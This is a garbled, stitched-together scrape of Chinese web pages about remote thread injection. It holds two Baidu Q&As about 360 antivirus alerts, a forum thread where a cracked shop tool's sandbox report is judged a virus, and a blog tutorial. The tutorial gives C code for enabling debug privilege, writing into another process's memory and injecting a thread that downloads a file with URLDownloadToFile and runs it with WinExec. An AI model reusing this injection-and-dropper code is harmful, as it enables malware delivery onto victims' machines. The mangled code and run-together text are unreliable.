360 显示远程线程注入然后 断网，如何解决？。。。。。_百度知道
360 显示远程线程注入然后 断网，如何解决？。。。。。
。。。QQ还在线。..。.。远程线程注入多达1000次..。解决加分。。每几个小时就这样.。。。..本来以为是ARP攻击。。。。不知如何是好，360还是自动允许。。。无法上网，可是360显示是系统防火墙遭受攻击.。。.
。不知道是不是只是断网两分钟。现在还是间歇断网。。。。。。。。MSE杀毒查不出有什么问题。。。。只是过一两分钟我CMD命令arp -s a的又可以恢复。。。。装了360杀毒查不出来问题立马就卸载了
提问者采纳
360就是抓住了用户心里，其实大部分杀毒软件都有这样的功能.楼主先把360卸载了，还不如德国那个小红伞免费版的好用，如果有大量的攻击、网游.。如果没有问题，曾经用了个瑞星，说明系统有什么问题、迅雷是否被影响、浩方.，国产货很让我失望..，那就是360的仇家来找他的事了、BT。我是不大用这些东西的.，杀毒能力弱就在功能上搞得五花八门？有杀毒软件就行了，否则？为什么大家对360这么重情呢，换个防火墙装上。那么网就没断，让他们到电脑外面去解决。不知道浏览网页，就要打补丁，有优化大师的话在清理一下系统既然QQ可以在线，给人感觉他很敬业的样子，一大堆名词层出不穷
提问者评价
算了，就这样吧。。。。休息两分钟也未尝不是好事。。。。。
其他类似问题
为您推荐：
您可能关注的推广
远程线程注入的相关知识
其他1条回答
把图片贴出来把 ！
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁远程线程注入被我阻止了_百度知道
远程线程注入被我阻止了
在线等答案，是说远程线程注入，谢谢:&#92，可以告诉我要是被注入了会导致多大的问题;AppData&#92，路径是C，还有 .360se&#92，谢谢;bin&#92，我要具体解决方法，我不要百度出来的;Users&#92，被我阻止了，不知道危险到底有多大;360Roaming\Admin&#92，就发现360弹出窗口刚才打开浏览器
进程自然消失.exe是一个系统服务的进程. 　　我也用过、 　　reg add “HKLM&#92，感觉第二种方法较好;wmiprvse，从而实现木马对系统的侵害。 　　禁用Windows Management Instrumentation Driver Extensions服务或者改为手动 　　具体，需要使用插入到目标进程中的远程线程将该木马DLL插入到目标进程的地址空间。 　　解除命令方法。 这种技术一般用于外挂
当外挂注入到游戏中时 你的电脑也就中啦木马
一般的解决方法　wmiprvse，即利用该线程通过调用Windows API LoadLibrary函数来加载木马DLL.exe” &#47。即可：桌面-我的电脑-管理-服务和应用程序-服务 里面有个Windows Management Instrumentation 右键—禁用就可以了;CurrentVersion\Microsoft\Windows NT&#92，你可以结束任务首先来了解远程线程注入远程线程插入（注入）技术指的是通过在另一个进程中创建远程线程的方法进入目标进程的内存地址空间;SOFTWARE&#92。将木马程序以DLL的形式实现后;Image File Execution Options&#92：同样操作复制下边的命[1][2][3]令粘贴输入，回车确定
其他类似问题
为您推荐：
远程线程注入的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁只需一步，快速开始
后使用快捷导航
关于远程线程注入
该用户从未签到
马上注册，结交更多好友，享用更多功能，让你轻松玩转社区。
才可以下载或查看，没有帐号？
本帖最后由 pinnacles 于
17:37 编辑
一个破解软件，运行就提示远程线程注入，我点拒绝之后还是能运行软件，不过是演示版，给我软件的人告诉要么关闭，要么点允许注入才能破解为正式版。大神帮俺看看吧，谢谢啦！
另外，我去看了下这个软件的正版注册方式是用卡密形式的在线发放验证的。
文件名称：天音淘宝店铺宝贝批量下载复制大师V2.83.13破解版.exe
MD5：aaa2d6d981d049e98e4d
Sha-1：35fc146f0fc5d3a1ccbd6b
文件大小：1.43MB
创建时间： 16:18:51
文件类型：EXE
PEID信息：Nothing found *
文件注释：小众论坛(bbs.xzrj.cc)制作
公司描述：小众论坛
文件描述：小众论坛制作
文件版本：1.0.0.0
版权所有：小众论坛制作
产品名称：破解
产品版本：1.0.0.0
& && &设置远程线程上下文;inline hook 自身进程
新毒霸点评
&&经新毒霸云安全中心分析，该文件存在病毒，请及时删除！
其他行为监控
行为描述：inline hook 自身进程
附加信息：天音淘宝店铺宝贝批量下载复制大师V2.83.13破解版.exe GDI32.dll!ExtTextOutA Ordinal: 222 HookType: InlineHook GDI32.dll!ExtTextOutW Ordinal: 223 HookType: InlineHook USER32.dll!BeginPaint Ordinal: 14 HookType: InlineHook USER32.dll!EnableScrollBar Ordinal: 196 HookType: InlineHook USER32.dll!EndPaint Ordinal: 201 HookType: InlineHook USER32.dll!GetDC Ordinal: 269 HookType: InlineHook USER32.dll!GetScrollBarInfo Ordinal: 341 HookType: InlineHook USER32.dll!GetScrollInfo Ordinal: 342 HookType: InlineHook USER32.dll!GetScrollPos Ordinal: 343 HookType: InlineHook USER32.dll!GetScrollRange Ordinal: 344 HookType: InlineHook USER32.dll!Get?DC Ordinal: 365 HookType: InlineHook USER32.dll!Get?LongA Ordinal: 367 HookType: InlineHook USER32.dll!Get?LongW Ordinal: 368 HookType: InlineHook USER32.dll!ReleaseDC Ordinal: 555 HookType: InlineHook USER32.dll!SetScrollInfo Ordinal: 623 HookType: InlineHook USER32.dll!SetScrollPos Ordinal: 624 HookType: InlineHook USER32.dll!SetScrollRange Ordinal: 625 HookType: InlineHook USER32.dll!Set?LongA Ordinal: 641 HookType: InlineHook USER32.dll!Set?LongW Ordinal: 642 HookType: InlineHook USER32.dll!Set?Rgn Ordinal: 645 HookType: InlineHook USER32.dll!?FromDC Ordinal: 725 HookType: InlineHook
行为描述：设置远程线程上下文
附加信息：%FEKERNEL%?dispatcher.exe
新增删除修改 注册表监控
HKEY_CURRENT_USER?Software?Microsoft?Multimedia?DrawDib
[vga.drv (BGR 0)] = [31,31,31,31]
文件名称：xz.exe
MD5：df135ec9d11a1099cee809
Sha-1：364cbfcbf0c35aaffd
文件大小：5.59MB
创建时间： 16:17:23
文件类型：EXE
PEID信息：Nothing found *
公司描述：天音工作室
文件描述：掌柜当家好帮手，让您轻松管理店铺，享受生活！
文件版本：2.8.3.0
产品版本：1.0.0.0
& && &隐藏指定窗口;查找文件;创建互斥体
其他行为监控
行为描述：创建互斥体
附加信息：?VideoRenderer?
行为描述：查找文件
附加信息：?%ProgramFiles%?xz.CH??%ProgramFiles%?xz.CHS??%ProgramFiles%?xz.zh??%ProgramFiles%?xz.zh-CN??%ProgramFiles%?xz.zh-Hans?
行为描述：隐藏指定窗口
附加信息：TLoginFrm : [xz.exe]
新增删除修改 注册表监控
HKEY_LOCAL_MACHINE?SOFTWARE?Microsoft??s?CurrentVersion?TianYin
[Connect HOST]184.174.134.1:80
[Connect HOST]240.28.10.17:80
[Open URL]184.174.134.1
[Open URL]240.28.10.17
[Resolve HOST
[Resolve HOST Name]
本帖最后由 FHX 于
08:18 编辑
&&经新毒霸云安全中心分析，该文件存在病毒，请及时删除！
设置远程线程上下文;inline hook 自身进程。确认病毒无疑。
逛了这许久，何不进去瞧瞧？
关注我们：Posts - 67,
Articles - 3,
Comments - 390
&&&&&&&&&&&&&&&&——非淡泊無以明志，非寧靜無以致遠。
19:27 by Florian, ... 阅读,
远程线程注入引出的问题
WindowsWindows APICreateRemoteThreaddllAPI
APICreateThread&&&&LPVOID&lpParameter,&&&&DWORD&dwCreationFlags,&&&&PDWORD&lpThreadId&&&&);
lpStartAddresslpParameter0LPVOIDLPTHREAD_START_ROUTINELPTHREAD_START_ROUTINE
CreateThreadCreateRemoteThread&&&&LPSECURITY_ATTRIBUTES&lpThreadAttributes,&&&&SIZE_T&dwStackSize,&&&&LPTHREAD_START_ROUTINE&lpStartAddress,&&&&LPVOID&lpParameter,&&&&DWORD&dwCreationFlags,&&&&LPDWORD&lpThreadId&&&&);
CreateThreadOpenProcess&&&&);
PROCESS_ALL_ACCESSfalseIDPIDTlHelp32.hCreateToolhelp32SnapshotProcess32FirstProcess32Next获取进程name的IDDWORD&getPid(LPTSTR&name){&&&&HANDLE&hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,<span style="color: #);//获取进程快照句柄&&&&assert(hProcSnap!=INVALID_HANDLE_VALUE);&&&&PROCESSENTRY32&pe32;&&&&pe32.dwSize=sizeof(PROCESSENTRY32);&&&&BOOL&flag=Process32First(hProcSnap,&pe32);//获取列表的第一个进程&&&&while(flag)&&&&{&&&&&&&&if(!_tcscmp(pe32.szExeFile,name))&&&&&&&&{&&&&&&&&&&&&CloseHandle(hProcSnap);&&&&&&&&&&&&return&pe32.th32ProcessID;//pid&&&&&&&&}&&&&&&&&flag=Process32Next(hProcSnap,&pe32);//获取下一个进程&&&&}&&&&CloseHandle(hProcSnap);&&&&return&<span style="color: #;}
getpidpidOpenProcess，这是远程注入线程引发的第一个问题，这里也有一段通用代码：
//提升进程权限int&EnableDebugPrivilege(const&LPTSTR&name){&&&&HANDLE&&&&&TOKEN_PRIVILEGES&&&&&//打开进程令牌环&&&&if(!OpenProcessToken(GetCurrentProcess(),&&&&&&&&TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&token))&&&&{&&&&&&&&cout&&"open&process&token&error!\n";&&&&&&&&return&<span style="color: #;&&&&}&&&&//获得进程本地唯一ID&&&&LUID&&&&&if(!LookupPrivilegeValue(NULL,name,&luid))&&&&{&&&&&&&&cout&&"lookup&privilege&value&error!\n";&&&&&&&&return&<span style="color: #;&&&&}&&&&tp.PrivilegeCount=<span style="color: #;&&&&tp.Privileges[<span style="color: #].Attributes=SE_PRIVILEGE_ENABLED;&&&&tp.Privileges[<span style="color: #].Luid=&&&&//调整进程权限&&&&if(!AdjustTokenPrivileges(token,<span style="color: #,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL))&&&&{&&&&&&&&cout&&"adjust&token&privilege&error!\n";&&&&&&&&return&<span style="color: #;&&&&}&&&&return&<span style="color: #;}
EnableDebugPrivilege(SE_DEBUG_NAME)CreateRemoteThreadCreateRemoteThreadCreateThread。CreateThreadCreateRemoteThread201201
201APIVirtualAllocExWriteProcessMemory&&&&LPVOID&lpAddress,&&&&SIZE_T&dwSize,&&&&DWORD&flAllocationType,&&&&DWORD&flProtect&&&&);
VirtualAllocEx*procAddr=(char*)VirtualAllocEx(hProc,NULL,<span style="color: #24,MEM_COMMIT,PAGE_READWRITE);
hProc1024&&&&LPVOID&lpBaseAddress,&&&&LPCVOID&lpBuffer,&&&&SIZE_T&nSize,&&&&SIZE_T&*&lpNumberOfBytesWritten&&&&);
memcpylpBuffer[nSize]hProcess:lpBaseAddress[nSize]
CreateRemoteThreadCreateRemoteThreaddlldll
Win32kernel32.dllWindowsdlldllMessageBoxMessageBox
dllAPI LoadLibraryALoadLibraryWMBCSLoadLibraryAkernel32.dllLoadLibraryALoadLibraryA201
LoadLibraryAdlldllLoadLibraryACreateRemoteThreaddll
dlldlldllDLL
VCVSWin32 DLL(ul_reason_for_call)&&&&{&&&&case&DLL_PROCESS_ATTACH://加载时候&&&&&&&&//do&something&&&&&&&&break;&&&&default:&&&&&&&&break;&&&&}&&&&return&TRUE;}
switch-casecase DLL_PROCESS_ATTACHEDLL的问题，至于写什么有你自己决定。其实DLLdlldll
DLL360DLLdlldll
LoadLibraryADLL
。通过类比CreateThreadCreateThreadLPSECURITY_ATTRIBUTESAPIkernel32.dlldllkernel32.dllLoadLibraryAdllkernel32.dllGetProcAddressMessagBoxWindowsAPI
。定位包含两层含义：代码的起始位置和代码的长度。有人说这个简单，起始位置就是函数名的值，长度虽然不好确定，就给一个比较大的值就可以了。这个思路是没有问题的，但是实际上这么做并不一定成功！问题不在代码长度上，而是出现在代码的起始位置。为此我们专门做一个实验：
main0x003d1131main0x003d1380
0xpushmainprintfmain0x@ILT+300=0x1151131_main@ILT_main
@ILT+0jmp_mainjmpjmpmain=0x1151380ILTILTIncremental Linking TableDebugRelease
DebugILTjmpmain
_mainjmpE9jmp32x860x0000024A_main0xmain=0xxxmain将函数地址转换为真实地址unsigned&int&getFunRealAddr(LPVOID&fun){&&&&unsigned&int&realaddr=(unsigned&int)//虚拟函数地址&&&&//&计算函数真实地址&&&&unsigned&char*&funaddr=&(unsigned&char*)&&&&if(funaddr[<span style="color: #]==<span style="color: #xE9)//&判断是否为虚拟函数地址，E9为jmp指令&&&&{&&&&&&&&int&disp=*(int*)(funaddr+<span style="color: #);//获取跳转指令的偏移量&&&&&&&&realaddr+=<span style="color: #+//修正为真实函数地址&&&&}&&&&return&}
需要注意的是这个转换函数只能针对本地定义的函数，如果是系统的库函数就无能为力了，因为库函数并没有存在ILT
Debug0xCCint 3PC
&ProcSize=<span style="color: #;//实际代码长度，存放线程函数代码char*buf=(char*)getFunRealAddr(ThreadProc);for(char*p=ProcSize&<span style="color: #48;ProcSize++,p++)//扫描到第一组连续的8个int&3指令作为函数结束标记{&&&&if((unsigned&long&long)*(unsigned&long&long*)p&&&&&&&&&&&&==<span style="color: #xcccccccccccccccc)//中断指令int&3&&&&{&&&&&&&&break;&&&&}}
OllyDbgVirtualAllocEx才可以！！！这个细节作为第六个小问题。
VirtualProtectExCreateRemoteThread线程参数结构struct&RemotePara{&&&&TCHAR&url[<span style="color: #6];//下载地址&&&&TCHAR&filePath[<span style="color: #6];//保存文件路径&&&&DWORD&downA//下载函数的地址&&&&DWORD&execA//执行函数的地址};DWORD&WINAPI&ThreadProc(LPVOID&lpara){&&&&RemotePara*para=(RemotePara*)&&&&typedef&UINT&(WINAPI*winExec)(LPTSTR&cmdLine,UINT&cmdShow);//定义WinExec函数原型&&&&typedef&UINT&(WINAPI*urlDownloadToFile)(LPUNKNOWN&caller,LPTSTR&url,LPTSTR&fileName&&&&&&&&,DWORD&reserved,LPBINDSTATUSCALLBACK&sts);//定义URLDownloadToFile函数原型&&&&urlDownloadToFile&&&&&download=(urlDownloadToFile)para-&downA//获取download函数地址&&&&winExec&&&&&exe=(winExec)para-&execA//获取exe函数地址&&&&&&&&download(<span style="color: #,para-&url,para-&filePath,<span style="color: #,NULL);//下载文件&&&&exe(para-&filePath,SW_SHOW);//执行下载的文件&&&&return&<span style="color: #;}
APIURLDownloadToFileWinExecexeAPI
_RTC_CheckEspILTILT520call 0xDA120DILTRelease
ReleaseESPDebug
WinExecAPI